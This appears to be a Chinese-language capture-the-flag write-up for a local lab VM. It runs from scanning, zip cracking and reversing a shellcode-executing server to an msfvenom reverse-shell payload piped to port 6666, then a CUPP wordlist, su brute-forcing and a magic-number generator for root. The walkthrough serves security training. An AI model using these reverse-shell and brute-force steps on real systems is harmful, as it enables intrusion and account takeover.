信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.227  08:00:27:a1:cf:6f       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.103 seconds (121.73 hosts/sec). 4 responded
❯ export ip=192.168.60.227
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.227:22
Open 192.168.60.227:80
Open 192.168.60.227:6666
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 17:44 CST
Initiating ARP Ping Scan at 17:44
Scanning 192.168.60.227 [1 port]
Completed ARP Ping Scan at 17:44, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:44
Completed Parallel DNS resolution of 1 host. at 17:44, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:44
Scanning 192.168.60.227 [3 ports]
Discovered open port 80/tcp on 192.168.60.227
Discovered open port 22/tcp on 192.168.60.227
Discovered open port 6666/tcp on 192.168.60.227
Completed SYN Stealth Scan at 17:44, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.227
Host is up, received arp-response (0.00044s latency).
Scanned at 2025-03-04 17:44:51 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
6666/tcp open  irc     syn-ack ttl 64
MAC Address: 08:00:27:A1:CF:6F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

扫一下目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.227
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 930]
/mysecret.txt         (Status: 200) [Size: 383]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

得到一个文本

curl一下

哈哈哈，字典有点上昵称可太熟悉了🤣

❯ curl $ip/mysecret.txt
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.


去那个最邪恶的端口。
你会得到你想要的。
请对他温柔一点，也许它会害怕。
为了得到它的源码。
也许你会需要下面的字典。




/YTlPX4d2UENbWnI.txt
❯ curl $ip/YTlPX4d2UENbWnI.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower

测试入口

既然给了提示，那只能在6666端口寻找信息了

利用nc连接一下，随便输入一点东西，会提示等待连接

❯ nc $ip 6666 -vn
(UNKNOWN) [192.168.60.227] 6666 (?) open
id
Hackers, get out of my machine
[*] 等待客户端连接...

既然靶机名字叫easypwn那必然是和pwn有关的

在上面拿到的字典中再次扫描一下目录

得到/ll104567.zip

❯ curl  $ip/YTlPX4d2UENbWnI.txt -o user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   100    68  100    68    0     0  27102      0 --:--:-- --:--:-- --:--:-- 34000
❯ gobuster dir -u "http://$ip" -w user.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.227
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                user.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/ll104567             (Status: 200) [Size: 739584]
/ll104567.zip         (Status: 200) [Size: 739584]
Progress: 50 / 55 (90.91%)
===============================================================
Finished
===============================================================

wget一下，拿到压缩包

❯ wget $ip/ll104567.zip
--2025-03-04 18:19:48--  http://192.168.60.227/ll104567.zip
Connecting to 192.168.60.227:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 739584 (722K) [application/zip]
Saving to: ‘ll104567.zip’

ll104567.zip                          100%[=======================================================================>] 722.25K  --.-KB/s    in 0.03s

2025-03-04 18:19:48 (22.5 MB/s) - ‘ll104567.zip’ saved [739584/739584]

❯ zip2john ll104567.zip >hash
ver 2.0 efh 5455 efh 7875 ll104567.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
oooooo           (ll104567.zip/opt/server)
1g 0:00:00:00 DONE (2025-03-04 18:19) 25.00g/s 204800p/s 204800c/s 204800C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ x ll104567.zip
extract: extracting to ll104567
Archive:  /home/Pepster/hmv/ll104567.zip
[/home/Pepster/hmv/ll104567.zip] opt/server password:
  inflating: opt/server
❯ tree opt
opt
└── server

1 directory, 1 file

解压后拿到server文件，还是个可执行文件

❯ cd opt
❯ ls -al
total 2080
drwxr-xr-x  2 Pepster Pepster    4096 Mar  4 18:20 .
drwxr-xr-x 10 Pepster Pepster    4096 Mar  4 18:20 ..
-rwxr-xr-x  1 Pepster Pepster 2120576 Feb 24 21:08 server
❯ file server
server: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=db87ec3af59f50fcd961031784692ff086072fd2, not stripped

Server 程序逆向

利用IDA打开逆向一下

虽然我不会这个，没事，现学就完了

发现是端口6666运行程序，逆向生成伪C代码

直接丢给GPT，解释下

主要功能如下

创建一个套接字并绑定到端口 6666。

监听该端口的传入连接。

接受传入连接后，读取数据，并检查数据是否包含禁止字节。

如果数据包含禁止字节，打印警告信息并关闭连接。

如果数据不包含禁止字节，将数据映射到内存并执行。

处理过程中出现的错误并打印相应错误信息。

我有幸玩了一下提前版的靶机，在初版的交互下，会具体显示某个禁止字节

比如我随便输入在第二位填一个空格，就会提示检测到0x20(space)

所以我们只需要生成shellcode并过滤被禁止的字符

但在正式版的靶机中作者可能考虑到了这一点，删除了相关代码

所以我们就需要跟踪forbidden_bytes

关注db后的十六进制

根据.rodata段提供的信息可以提取出部分禁止的字节

0x00 (NULL) 0x20(space) 0x0F 0xCD

生成Shellcode

利用msfvenom生成一个反弹shell的shellcode

添加-b参数排除禁止的字节

❯ msfvenom -p linux/x64/shell_reverse_tcp Lhost=192.168.60.100 Lprot=4444 -b '\x00\x20\x0f\xcd' -f raw > tmp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes

用户提权

将此payload，写入6666端口

同时监听端口即可反弹回shell

拿到user了

❯ cat tmp|nc $ip 6666
------------------------------
❯ pwncat-cs -lp 4444
[20:03:10] Welcome to pwncat 🐈!                           __main__.py:164
[20:06:12] received connection from 192.168.60.227:50488        bind.py:84
[20:06:13] 0.0.0.0:4444: upgrading from /usr/bin/dash to    manager.py:957
           /usr/bin/bash
[20:06:14] 192.168.60.227:50488: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) lamb@pwnding:/home/lamb$ ls -al
total 28
drwxr-xr-x 2 lamb lamb 4096 Feb 24 07:52 .
drwxr-xr-x 3 root root 4096 Feb 19 20:34 ..
lrwxrwxrwx 1 lamb lamb    9 Feb 19 09:27 .bash_history -> /dev/null
-rw-r--r-- 1 lamb lamb  220 Feb 19 09:23 .bash_logout
-rw-r--r-- 1 lamb lamb 3526 Feb 19 09:23 .bashrc
-rw-r--r-- 1 lamb lamb  807 Feb 19 09:23 .profile
-rw------- 1 lamb lamb    0 Feb 20 03:18 .viminfo
-rw-r--r-- 1 root root  528 Feb 24 07:52 this_is_a_tips.txt
-rw-r--r-- 1 lamb lamb   39 Feb 24 07:52 use3e3e3e3e3sr.txt
(remote) lamb@pwnding:/home/lamb$ cat use3e3e3e3e3sr.txt
flag{3a463d08f2ae11efbeb6000c29094b2d}

(remote) lamb@pwnding:/home/lamb$ cat this_is_a_tips.txt
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.

有一个很好玩的工具叫做 cupp.
听说那是一个不错的社会工程学字典生成器.
现在真的还会有人这么蠢吗？haha.
成为 ROOT 的方法只有一条，就是执行 getroot !!!
而且你不要忘记了，这是一个pwn类型的机器.

Getroot 程序逆向

同时还有一个note提示

只有getroot这一条方案，需要进行传参一个magic_number，你无论输入什么数字都没有回显

那找到这个程序，逆向不就完了

文件可读可执行，拷贝到本地

(remote) lamb@pwnding:/home/lamb$ getroot
Usage: getroot <magic_number>
(remote) lamb@pwnding:/home/lamb$ which getroot
/usr/local/bin/getroot
(remote) lamb@pwnding:/home/lamb$ ls -al /usr/local/bin/getroot
-rwxr-xr-x 1 root root 18912 Feb 20 02:19 /usr/local/bin/getroot
(remote) lamb@pwnding:/home/lamb$ cp /usr/local/bin/getroot .
(remote) lamb@pwnding:/home/lamb$
(local) pwncat$ download getroot
getroot ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 18.9/18.9 KB • ? • 0:00:00
[20:21:39] downloaded 18.91KiB in 0.07 seconds

IDA Pro打开看一下

丢给Deepseek，让他一点点分析，给出代码程序生成magic_number以完全匹配原始代码逻辑

步骤如下：

获取当前时间的种子，调用srand(seed)。

第一次调用rand()，得到v21 = rand() % 86400.

接下来，调用generate_normal_distribution，这内部会调用两次rand()，生成u1和u2，然后计算正态分布的z0。

根据z0的值（v3）计算temp = (int)(5.0 * z0) + v21.

将temp限制在0到86399之间，得到v16.

key = v16 + 12345.

所以需要跟进一下generate_normal_distribution，查看实现的算法之后

得到完整代码完全复现原始程序的调用顺序

#include <iostream>
#include <cmath>
#include <ctime>
#include <cstdlib>
#include <algorithm>

using namespace std;

double generate_normal_distribution() {
    // 使用两次rand()，避免与后续rand()调用顺序冲突
    double x = rand() / 2147483647.0; // 注意：2147483647 = 0x7FFFFFFF
    double v3 = rand() / 2147483647.0;
    
    double v0 = log(x);          // 原IDA伪代码中的log计算
    double v2 = sqrt(-2.0 * v0); // 平方根部分
    
    // 6.283185307179586对应2*M_PI的精度
    return cos(6.283185307179586 * v3) * v2;
}

int main() {
    srand(time(0)); // 同步时间种子
    
    // 生成第一个随机数（对应原程序v21）
    int v21 = rand() % 86400;
    
    // 生成正态分布值（使用后续两个rand()调用）
    double normal_value = generate_normal_distribution();
    
    // 计算最终值
    int temp = static_cast<int>(5.0 * normal_value) + v21;
    temp = max(0, min(temp, 86399)); // 强制限制范围
    int key = temp + 12345;          // 最终密钥
    
    cout << key << endl;
    return 0;
}

传到靶机上编译一下

(remote) lamb@pwnding:/tmp$
(local) pwncat$ upload a.c
./a.c ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.1/1.1 KB • ? • 0:00:00
[20:50:35] uploaded 1.11KiB in 0.27 seconds  
(remote) lamb@pwnding:/tmp$ g++ -o key a.c -B /usr/bin/
(remote) lamb@pwnding:/tmp$ ./key
61018

CUPP 字典生成

不过通过伪C代码中得知，程序在获得正确的magic_number会去尝试打开/root/cred文件并输出内容

而我们对于root的文件夹是没有权限读取的

大概是要sudo权限执行

但问题是我们不知道lamb用户的密码

根据提示来CUPP社工生成字典来爆破

跑一下linpeas.sh，发现/var/backups存在一个隐藏文件

1	-rw-r--r-- 1 root root 1936 Feb 24 07:59 /var/backups/.secret/.verysecret/.noooooo/note2.txt

这…… 只能得到David Jake两个用户名还一个松鼠名Sir Nibbles，其他啥信息也没有

在这卡了半小时了😅

我首先尝试了将用户名作为First name和surname直接输入得到字典，无果

后面又尝试直接将文本作为信息源传个cupp生成19行数据跑了一会

问作者要点提示，也是一时间没反应过来，呆了😑

仔细阅读note中的故事，会发现这是爸爸David和儿子Jake的故事

所以有填写顺序

❯ python cupp.py -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: David
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name: Jake
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to david.txt, counting 500 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with david.txt and shoot! Good luck!
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.227 - - [04/Mar/2025 22:39:54] "GET /david.txt HTTP/1.1" 200 -

Root提权

利用SuForce跑一下字典

d4t4s3c/suForce: Obtain a user’s system password, this tool uses the su binary to perform a brute force attack until a successful collision occurs.

得到密码ekaJ_2016

(remote) lamb@pwnding:/tmp$ wget 192.168.60.100:8000/david.txt
--2025-03-04 09:39:55--  http://192.168.60.100:8000/david.txt
Connecting to 192.168.60.100:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4987 (4.9K) [text/plain]
Saving to: 'david.txt.2'

david.txt.2        100%[==============>]   4.87K  --.-KB/s    in 0s

2025-03-04 09:39:55 (459 MB/s) - 'david.txt.2' saved [4987/4987]
(remote) lamb@pwnding:/tmp$ ./suForce -u lamb -w david.txt.2
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | lamb
📖 Wordlist | david.txt.2
🔎 Status   | 372/499/74%/ekaJ_2016
💥 Password | ekaJ_2016
───────────────────────────────────


(remote) lamb@pwnding:/tmp$ sudo -l
[sudo] password for lamb:
Matching Defaults entries for lamb on pwnding:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lamb may run the following commands on pwnding:
    (ALL : ALL) PASSWD: /usr/local/bin/getroot

利用getroot拿到root的凭证登入即可

(remote) lamb@pwnding:/tmp$ sudo /usr/local/bin/getroot $(./key)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0
(remote) lamb@pwnding:/tmp$ su root
Password:
root@pwnding:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@pwnding:/tmp# cat /root/
.bash_history                      ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
.bashrc                            .selected_editor
cred                               .ssh/
.local/                            .vim/
monitor.sh                         .viminfo
.profile
root@pwnding:/tmp# cat /root/ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
flag{46511d58f2ae11ef9ea3000c29094b2d}